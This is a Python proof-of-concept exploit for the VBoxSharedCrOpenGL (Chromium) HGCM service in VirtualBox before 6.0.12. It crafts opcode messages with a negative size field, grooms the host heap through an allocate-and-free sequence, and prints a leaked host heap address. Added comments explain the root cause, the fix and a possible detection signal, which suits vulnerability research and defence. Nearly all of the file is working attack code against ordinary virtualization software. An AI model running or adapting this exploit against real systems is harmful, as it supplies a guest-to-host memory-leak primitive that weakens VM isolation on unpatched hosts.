# Author : peternguyen93 | |
# Proof-of-concept driver for the VBoxSharedCrOpenGL (Chromium) HGCM service.
# It builds two CR_MESSAGE_OPCODES messages carrying CR_EXTEND_OPCODE payloads,
# allocates and dispatches them through the vboxlib helpers, and prints eight
# bytes of the returned buffer as a leaked heap address. The bare string below
# states the affected range (VirtualBox < 6.0.12) and quotes the unpacker macro
# at fault; the inline notes are written for reproducing the bug in a lab and
# for deriving detections, not for anything beyond what the script already does.
import sys | |
sys.path.append('../') # back to vboxlib module | |
from vboxlib.hgcm import * | |
from vboxlib.chromium import * | |
from ctypes import * | |
# NOTE(review): pack/unpack, the CR_* constants, hgcm_connect, set_version,
# alloc_buf, msg_dispatch and hgcm_disconnect are all provided by the star
# imports above (pack/unpack presumably struct re-exported by vboxlib); none of
# their contracts are visible in this file, so the comments below describe only
# what this script itself assembles and reads.
''' | |
Affect VirtualBox version < 6.0.12 | |
./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h | |
--------------------------------------------------------------------- | |
#define INCR_DATA_PTR( delta ) \ | |
cr_unpackData += (delta) | |
#define INCR_VAR_PTR() \ | |
INCR_DATA_PTR( *((int *) cr_unpackData ) ) | |
--------------------------------------------------------------------- | |
''' | |
# Root cause as far as the quoted macro shows: INCR_VAR_PTR reads the opcode's
# size field as a signed int and adds it to cr_unpackData with no bounds check,
# so a size with the sign bit set (op1 below) moves the unpack pointer backwards
# out of the message. Mitigation is the host-side fix in 6.0.12+; a guest-to-
# host Chromium opcode whose size field is negative is presumably never produced
# by a legitimate guest driver, which makes it a usable detection signal for
# anyone inspecting HGCM traffic — assumption, confirm against the real driver.
# op2: a small "filler" opcode used to pad tmp_msg up to 4096 bytes (see below).
op2 = b'' | |
op2+= pack('<I', 0x28) # size opcode (we control) | |
op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) | |
op2+= pack('<I', 0x1000) # size (n) | |
op2+= b'A'*4 # padding | |
# op1 = pack('<B', CR_EXTEND_OPCODE) | |
# op1: the triggering opcode. c_uint32(-0x2050).value is the two's-complement
# image of -0x2050, so the packed size field reads back as a negative int
# through the `(int *)` cast in INCR_VAR_PTR above.
op1 = b'' | |
op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) | |
op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) | |
op1+= pack('<II', 48, 64) | |
op1+= b'A'*0x20 | |
# msg: header, an opcode count of 2, two CR_EXTEND_OPCODE bytes, op1, then 'X'
# padding to 4096 bytes. The 0x41414141 header word is a marker value chosen by
# the author; its meaning to the service is not visible here.
msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
msg+= pack('<I', 2) # number of opcode | |
msg+= b'\x00'*2 # padding | |
msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
msg+= op1 | |
msg = msg.ljust(4096, b'X') | |
# tmp_msg: same header shape but an opcode count of 1, op1, then as many copies
# of op2 as fit, and 'P' padding to exactly 4096 bytes. It is the content of the
# four "shaping" buffers allocated below.
tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
tmp_msg+= pack('<I', 1) # number of opcode | |
tmp_msg+= b'\x00'*2 # padding | |
tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
tmp_msg+= op1 | |
tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) | |
tmp_msg = tmp_msg.ljust(4096, b'P') | |
# Two independent HGCM connections to the same service; set_version is called
# on each (its effect is not visible in this file).
client = hgcm_connect('VBoxSharedCrOpenGL') | |
set_version(client) | |
client1 = hgcm_connect('VBoxSharedCrOpenGL') | |
set_version(client1) | |
# Allocation/free order below is the heap-shaping step: four 0x1000 buffers on
# client, buf4 released, msg placed from client1, buf3/buf2 released, then buf5
# dispatched. The heap layout this relies on (buf5 landing next to the freed
# chunks) is not established by the script — it depends on the host allocator
# and build; TODO confirm on the affected build before treating the leak as
# deterministic. msg_dispatch apparently both executes and frees a buffer (per
# the author's comments) — verify against vboxlib.
buf1 = alloc_buf(client, 0x1000, tmp_msg) | |
buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here | |
print('free buf4') | |
msg_dispatch(client, buf4) # free buf4 | |
print('alloc buf4') | |
buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap | |
print('free buf3') | |
msg_dispatch(client, buf3) | |
print('free buf2') | |
msg_dispatch(client, buf2) | |
print('execute buf5') | |
# res is whatever msg_dispatch returns for buf5; the script treats it as bytes,
# prints the first 64 chars of its repr, and reads bytes 8..16 as a little-
# endian u64. Why that offset holds a host heap pointer is not shown here —
# presumably a Chromium reply header field; verify before relying on it.
res = msg_dispatch(client1, buf5) | |
print(repr(res)[:64]) | |
heap_address = unpack('<Q', res[8:16])[0] | |
print('heap:', hex(heap_address)) | |
# Tear down both connections.
hgcm_disconnect(client) | |
hgcm_disconnect(client1) |